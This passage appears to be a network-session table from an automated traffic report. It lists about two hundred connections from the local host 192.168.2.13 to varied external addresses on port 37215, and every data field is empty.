                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12642192.168.2.1340552141.221.49.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12643192.168.2.1347246197.254.188.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12644192.168.2.1340692197.127.130.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12645192.168.2.1346172162.16.53.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12646192.168.2.1353656197.166.165.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12647192.168.2.1360912197.104.54.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12648192.168.2.1347680157.137.34.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12649192.168.2.1359998197.154.121.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12650192.168.2.1349110157.245.146.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12651192.168.2.1337200197.252.148.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12652192.168.2.133448441.196.193.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12653192.168.2.1357346197.249.54.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12654192.168.2.1333506157.132.69.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12655192.168.2.1340454174.183.159.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12656192.168.2.13388262.244.237.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12657192.168.2.1347280157.3.52.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12658192.168.2.135358241.55.226.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12659192.168.2.1354098125.227.231.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12660192.168.2.1339646175.216.67.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12661192.168.2.1356568157.229.211.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12662192.168.2.133332899.24.160.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12663192.168.2.1339988143.76.195.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12664192.168.2.134467641.171.26.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12665192.168.2.1334594157.239.238.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12666192.168.2.1346756197.45.131.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12667192.168.2.134702275.63.194.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12668192.168.2.135273848.2.229.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12669192.168.2.1339896157.185.0.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12670192.168.2.1352638198.34.50.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12671192.168.2.1337194197.18.174.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12672192.168.2.135366841.23.25.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12673192.168.2.134741041.169.13.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12674192.168.2.1347730170.54.251.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12675192.168.2.133362441.228.93.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12676192.168.2.1341304157.13.76.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12677192.168.2.1336638157.138.150.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12678192.168.2.1334548157.75.188.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12679192.168.2.133933841.156.175.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12680192.168.2.13469108.162.139.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12681192.168.2.135750694.53.26.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12682192.168.2.1348534157.247.71.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12683192.168.2.1338224197.246.82.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12684192.168.2.1348732197.165.199.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12685192.168.2.1357884197.175.29.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12686192.168.2.1353572197.49.196.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12687192.168.2.135736841.187.41.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12688192.168.2.1359158197.158.224.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12689192.168.2.1341000157.109.133.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12690192.168.2.135563441.169.60.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12691192.168.2.1339244197.177.204.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12692192.168.2.1355306197.99.78.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12693192.168.2.1351278197.30.224.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12694192.168.2.1342512197.134.46.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12695192.168.2.1341982157.58.8.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12696192.168.2.1355278197.101.94.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12697192.168.2.1358448157.180.239.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12698192.168.2.1334878157.203.69.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12699192.168.2.135059041.219.24.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12700192.168.2.1352370178.233.5.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12701192.168.2.1337522157.15.49.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12702192.168.2.1344052172.153.158.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12703192.168.2.135313041.153.214.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12704192.168.2.1348136101.146.241.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12705192.168.2.1343590157.38.68.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12706192.168.2.1332972197.233.30.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12707192.168.2.133435441.87.156.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12708192.168.2.135773441.228.99.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12709192.168.2.13373608.156.202.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12710192.168.2.135436453.82.49.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12711192.168.2.135063072.229.37.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12712192.168.2.1342786112.115.20.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12713192.168.2.1339422157.158.158.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12714192.168.2.1356954197.161.102.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12715192.168.2.134886041.131.120.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12716192.168.2.1348504197.183.235.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12717192.168.2.1341554197.170.38.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12718192.168.2.1350404157.54.186.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12719192.168.2.1353732157.108.138.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12720192.168.2.1335356197.191.12.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12721192.168.2.1356694157.132.218.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12722192.168.2.133467441.66.170.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12723192.168.2.1343622157.190.8.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12724192.168.2.135727462.70.222.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12725192.168.2.134447841.212.75.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12726192.168.2.1344828217.172.254.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12727192.168.2.1338424197.23.186.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12728192.168.2.133581441.55.147.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12729192.168.2.136089841.100.183.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12730192.168.2.134888041.108.235.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12731192.168.2.134145278.243.4.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12732192.168.2.1342960178.8.107.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12733192.168.2.135160441.156.243.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12734192.168.2.1336174157.156.53.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12735192.168.2.1355656197.233.78.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12736192.168.2.134028041.157.22.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12737192.168.2.1341350157.138.199.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12738192.168.2.133381041.240.35.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12739192.168.2.1336234157.76.189.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12740192.168.2.1351302157.27.191.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12741192.168.2.1360324197.105.140.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12742192.168.2.1353242156.201.81.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12743192.168.2.1336834157.133.149.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12744192.168.2.1350092197.153.188.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12745192.168.2.1357874197.128.183.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12746192.168.2.1346476157.234.224.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12747192.168.2.135604041.51.218.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12748192.168.2.1337568197.134.42.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12749192.168.2.135407041.2.159.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12750192.168.2.133901241.147.153.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12751192.168.2.135314441.25.134.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12752192.168.2.133397672.225.135.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12753192.168.2.135867441.83.200.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12754192.168.2.1333800197.244.177.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12755192.168.2.1340018157.2.98.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12756192.168.2.1356802157.183.95.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12757192.168.2.1337938157.206.109.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12758192.168.2.1352148197.181.50.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12759192.168.2.134121641.245.168.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12760192.168.2.1337972197.13.177.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12761192.168.2.1346246197.71.157.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12762192.168.2.133334641.196.107.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12763192.168.2.133392041.166.147.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12764192.168.2.1339550197.82.218.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12765192.168.2.1350544157.190.118.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12766192.168.2.1345968157.210.22.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12767192.168.2.1355356101.103.148.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12768192.168.2.1341382197.208.50.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12769192.168.2.1348772181.218.191.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12770192.168.2.1333006120.207.141.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12771192.168.2.134976241.168.244.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12772192.168.2.1346596157.246.195.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12773192.168.2.135812841.42.4.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12774192.168.2.135786641.123.238.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12775192.168.2.1340320157.156.88.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12776192.168.2.1344990197.172.254.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12777192.168.2.1356854157.19.115.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12778192.168.2.1338326197.65.8.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12779192.168.2.1340828157.208.188.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12780192.168.2.134094052.123.72.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12781192.168.2.136014641.107.99.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12782192.168.2.1340640197.9.9.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12783192.168.2.134733886.17.91.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12784192.168.2.133370641.106.88.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12785192.168.2.1335212197.56.248.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12786192.168.2.1354350197.136.209.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12787192.168.2.1360694197.68.83.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12788192.168.2.1338606161.36.81.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12789192.168.2.134328841.185.200.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12790192.168.2.135974441.188.47.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12791192.168.2.134788441.158.196.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12792192.168.2.1350922197.84.118.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12793192.168.2.1343204197.245.241.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12794192.168.2.1356760197.228.232.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12795192.168.2.1358538121.56.63.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12796192.168.2.1355070157.207.60.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12797192.168.2.1335648173.235.63.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12798192.168.2.1345404157.236.37.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12799192.168.2.1334292157.243.229.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12800192.168.2.133801241.49.89.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12801192.168.2.1338680157.124.153.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12802192.168.2.1348866157.48.17.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12803192.168.2.1351158197.13.248.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12804192.168.2.1346992197.212.57.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12805192.168.2.134345241.36.101.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12806192.168.2.1335596197.159.231.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12807192.168.2.135319241.91.59.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12808192.168.2.1346638157.213.175.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12809192.168.2.1336116197.114.12.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12810192.168.2.1343922157.30.231.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12811192.168.2.135877841.208.148.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12812192.168.2.1344712157.64.90.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12813192.168.2.135688441.21.20.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12814192.168.2.1358810197.28.250.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12815192.168.2.1345372157.12.151.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12816192.168.2.1358276197.149.16.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12817192.168.2.135430439.253.229.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12818192.168.2.1352092197.3.182.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12819192.168.2.1350254157.7.140.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12820192.168.2.13522222.226.98.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12821192.168.2.134852041.70.82.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12822192.168.2.1332778165.30.99.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12823192.168.2.1337026197.167.244.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12824192.168.2.1350024157.247.156.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12825192.168.2.134846841.65.208.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12826192.168.2.135112612.152.209.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12827192.168.2.1352194197.182.102.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12828192.168.2.1344000157.123.57.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12829192.168.2.1359816157.142.109.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12830192.168.2.1336842197.128.3.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12831192.168.2.1343740197.0.212.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12832192.168.2.1334042157.249.6.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12833192.168.2.1357952197.31.129.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12834192.168.2.1357558157.30.4.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12835192.168.2.1345342173.143.228.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12836192.168.2.134057874.28.92.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12837192.168.2.1347230197.65.34.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12838192.168.2.135645840.232.36.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12839192.168.2.135838241.104.6.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12840192.168.2.1344660157.192.232.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12841192.168.2.136041041.203.157.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12842192.168.2.1341882157.237.201.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12843192.168.2.133711641.174.188.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12844192.168.2.133659441.23.216.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12845192.168.2.1339462157.206.29.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12846192.168.2.1353022110.213.121.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12847192.168.2.134056441.67.22.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12848192.168.2.133734041.5.202.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12849192.168.2.1341844183.242.152.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12850192.168.2.1355170157.5.159.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
